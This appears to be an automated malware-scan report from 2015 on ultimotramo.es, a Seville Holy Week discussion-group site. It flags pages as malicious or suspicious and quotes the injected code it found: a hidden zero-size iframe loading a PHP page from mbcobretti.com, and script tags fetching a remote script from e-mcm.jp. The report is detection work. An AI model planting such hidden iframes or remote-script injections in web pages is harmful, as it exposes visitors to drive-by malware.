Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ultimotramo.es
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://ultimotramo.es/ | 200 OK Content-Length: 11162 Content-Type: text/html | malicious |
Page code contains blacklisted domain: mbcobretti.com <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Web de la Tertulia Cofrade "Último Tramo" de Sevilla</title> <style type="text/css"> <!-- body { background-image: url(images/fondo.jpg); } ...[4359 bytes skipped]... Malicious iFrame found. The same iFrame was found in 66 websites. size: 0x0 src: http://mbcobretti.com/hydra.php This URL is marked by Google as suspicious <iframe src=http://mbcobretti.com/hydra.php frameborder="0" width="0" height="0" scrolling="no" name=counter> | ||
http://www.clocklink.com/embed.js | 200 OK Content-Length: 1462 Content-Type: text/javascript | clean |
http://www.eltiempo.es/widget/widget_loader/4503e9f07ab3730e245de4be0145b3ef | 200 OK Content-Length: 928 Content-Type: text/javascript | clean |
http://www.google.es/coop/cse/brand?form=cse-search-box&lang=es | 200 OK Content-Length: 2510 Content-Type: text/javascript | clean |
http://s11.histats.com/js9.js | 200 OK Content-Length: 7417 Content-Type: text/javascript | clean |
http://ultimotramo.es/publicidad1.htm | 200 OK Content-Length: 3333 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://e-mcm.jp/miqnaoetsu/i/fnbrl76j.php?id=55387735"></script> | ||
http://ultimotramo.es/index.htm | 200 OK Content-Length: 11162 Content-Type: text/html | malicious |
Page code contains blacklisted domain: mbcobretti.com <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Web de la Tertulia Cofrade "Último Tramo" de Sevilla</title> <style type="text/css"> <!-- body { background-image: url(images/fondo.jpg); } ...[4359 bytes skipped]... Malicious iFrame found. The same iFrame was found in 66 websites. size: 0x0 src: http://mbcobretti.com/hydra.php This URL is marked by Google as suspicious <iframe src=http://mbcobretti.com/hydra.php frameborder="0" width="0" height="0" scrolling="no" name=counter> | ||
http://ultimotramo.es/BasesConcurso.htm | 200 OK Content-Length: 8016 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://e-mcm.jp/miqnaoetsu/i/fnbrl76j.php?id=55387674"></script> | ||
http://ultimotramo.es/fotos.htm | 200 OK Content-Length: 3689 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://e-mcm.jp/miqnaoetsu/i/fnbrl76j.php?id=55387720"></script> | ||
http://ultimotramo.es/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://ultimotramo.es/literatura.htm | 200 OK Content-Length: 17083 Content-Type: text/html | malicious |
Page code contains blacklisted domain: mbcobretti.com ...[1951 bytes skipped]... d.getElementById) x=d.getElementById(n); return x; } function MM_swapImage() { //v3.0 var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3) if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];} } //--> </script> </head> <body onLoad="MM_preloadImages('images/cabecera.png')"><iframe src=http://mbcobretti.com/hydra.php frameborde>Sevilla, Triana, sus barrios, y este año de manera especial, el Polígono de San Pablo, con su nueva Hermandad del Cautivo Rescatado, vivirán el discurrir de sus cofradías por calles y plazas, con su trasiego de gentes de un lado a otro, buscando su paso, en rincones diferentes.</p> <p>Derroche de luz, de fragancia, de sonidos de vencejos y de marchas, de silencio y de oraciones y de lla ...[1851 bytes skipped]... Malicious iFrame found. The same iFrame was found in 66 websites. size: 0x0 src: http://mbcobretti.com/hydra.php This URL is marked by Google as suspicious <iframe src=http://mbcobretti.com/hydra.php frameborder="0" width="0" height="0" scrolling="no" name=counter> | ||
http://ultimotramo.es/publicidad2.htm | 200 OK Content-Length: 3267 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://e-mcm.jp/miqnaoetsu/i/fnbrl76j.php?id=55387736"></script> | ||
http://ultimotramo.es/calendario.htm | 200 OK Content-Length: 2257 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://e-mcm.jp/miqnaoetsu/i/fnbrl76j.php?id=55387685"></script> | ||
http://ultimotramo.es/defensor.htm | 200 OK Content-Length: 5301 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://e-mcm.jp/miqnaoetsu/i/fnbrl76j.php?id=55387689"></script> | ||
http://ultimotramo.es/publicidad.htm | 200 OK Content-Length: 3336 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://e-mcm.jp/miqnaoetsu/i/fnbrl76j.php?id=55387734"></script> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ultimotramo.es
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 28 Jan 2015 03:02:26 GMT
Accept-Ranges: bytes
ETag: "119e5fc-2b9a-cb7e9cc0"
Server: Apache
Content-Length: 11162
Content-Type: text/html
Last-Modified: Thu, 23 Oct 2014 01:15:07 GMT
...11162 bytes of data.
GET / HTTP/1.1
Host: ultimotramo.es
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 28 Jan 2015 03:02:26 GMT
Accept-Ranges: bytes
ETag: "119e5fc-2b9a-cb7e9cc0"
Server: Apache
Content-Length: 11162
Content-Type: text/html
Last-Modified: Thu, 23 Oct 2014 01:15:07 GMT
...11162 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ultimotramo.es
Referer: http://www.google.com/search?q=ultimotramo.es
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ultimotramo.es
Referer: http://www.google.com/search?q=ultimotramo.es
Result:
The result is similar to the first query. There are no suspicious redirects found.